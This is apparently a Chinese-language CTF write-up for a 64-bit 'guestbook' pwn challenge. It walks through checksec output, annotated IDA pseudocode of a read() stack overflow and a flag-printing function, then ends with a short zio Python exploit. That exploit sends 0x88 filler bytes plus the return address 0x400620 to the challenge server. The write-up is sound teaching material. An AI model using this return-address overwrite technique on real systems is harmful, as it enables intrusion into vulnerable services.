tell me something

0x01 寻找漏洞

xfgg@ubuntu:~/Downloads$ file guestbook.d3d5869bd6fb04dd35b29c67426c0f05 
guestbook.d3d5869bd6fb04dd35b29c67426c0f05: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=7429502fc855237f3f8eeceb262ddcf6b2c2854e, not stripped

64位程序

xfgg@ubuntu:~/Downloads$ checksec guestbook.d3d5869bd6fb04dd35b29c67426c0f05
[*] '/home/xfgg/Downloads/guestbook.d3d5869bd6fb04dd35b29c67426c0f05'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

只开启了 NX 保护（无 canary、无 PIE）

ida分析

/*
 * Decompiled entry point (IDA pseudocode, not compilable source).
 * Prompts, then read()s up to 0x100 bytes into v4, an 8-byte local at
 * rbp-0x88. The read length exceeds the frame, so this call is the
 * stack-overflow sink of the binary; with no stack canary (see checksec
 * output above) the overrun reaches the saved return address.
 * Mitigation: bound the read to the buffer size (sizeof v4) and build
 * with -fstack-protector.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 v4; // [rsp+0h] [rbp-88h] -- 8-byte local; the read() below may write up to 0x100 bytes here

write(1, "Input your message:\n", 0x14uLL);
read(0, &v4, 0x100uLL); /* 0x100 > sizeof v4: unbounded stack write; return value also unchecked */
return write(1, "I have received your message, Thank you!\n", 0x29uLL);
}
read 最多读入 0x100 字节，远大于 v4 所在的 0x88 字节栈空间，存在栈溢出漏洞

/*
 * Decompiled helper (IDA pseudocode). Opens "flag.txt" and copies it to
 * stdout one byte at a time. It is not called from main as decompiled
 * above, so it is only reached by redirecting control flow (the writeup's
 * target address 0x400620).
 * Defects visible in the listing:
 *  - the fopen() result is never checked; a missing file makes fgetc(NULL) fault.
 *  - EOF is detected on the truncated low byte ((_BYTE)result == -1), so a
 *    0xFF byte inside the file ends the output early; compare result == EOF.
 *  - the FILE is never fclose()d.
 */
int good_game()
{
FILE *v0; // rbx -- FILE handle from fopen(), possibly NULL
int result; // eax -- last fgetc() value; doubles as the return value
char buf; // [rsp+Fh] [rbp-9h] -- one-byte staging buffer for write()

v0 = fopen("flag.txt", "r"); /* unchecked: NULL on failure */
while ( 1 )
{
result = fgetc(v0);
buf = result; /* int -> char truncation */
if ( (_BYTE)result == -1 ) /* low byte only: a 0xFF data byte looks like EOF */
break;
write(1, &buf, 1uLL); /* one syscall per byte; return value ignored */
}
return result; /* -1 (EOF) on the normal exit path */
}

good_game 会打开并输出 flag.txt，因此思路很简单：利用栈溢出把返回地址改成 good_game 即可。

0x02 思路分析

查看main函数的栈
-0000000000000088 db ? ; undefined
-0000000000000087 db ? ; undefined
-0000000000000086 db ? ; undefined
-0000000000000085 db ? ; undefined
-0000000000000084 db ? ; undefined

缓冲区位于 -0x88 处，填充 0x88 字节后即可覆盖返回地址

查看good_game的地址
.text:0000000000400620 push rbx
.text:0000000000400621 mov esi, offset modes ; "r"
.text:0000000000400626 mov edi, offset filename ; "flag.txt"
.text:000000000040062B sub rsp, 10h
.text:000000000040062F call _fopen
.text:0000000000400634 mov rbx, rax
.text:0000000000400637 jmp short loc_400654

0x400620 即 good_game 的地址，exp 中作为返回地址（sys_addr）使用

exp

学习使用zio库

# Proof-of-concept for the overflow identified above (Python 2 era, zio library).
import zio
# 0x88 filler bytes reach the saved return address (buffer at -0x88 in the
# stack view), followed by the little-endian 8-byte address of good_game
# (0x400620), so main returns into the flag-printing routine instead of
# its caller. The address is hand-encoded; struct.pack('<Q', 0x400620)
# expresses the same bytes less error-prone.
# A bounded read() in main or a stack canary would have stopped this input.
payload = "A" * 0x88 + "\x20\x06\x40\x00\x00\x00\x00\x00"
p = zio.zio(("pwn.jarvisoj.com", 9876))  # challenge endpoint; zio takes a (host, port) tuple
p.write(payload)
p.interact()  # hand the connection to the terminal so the program output (flag) is shown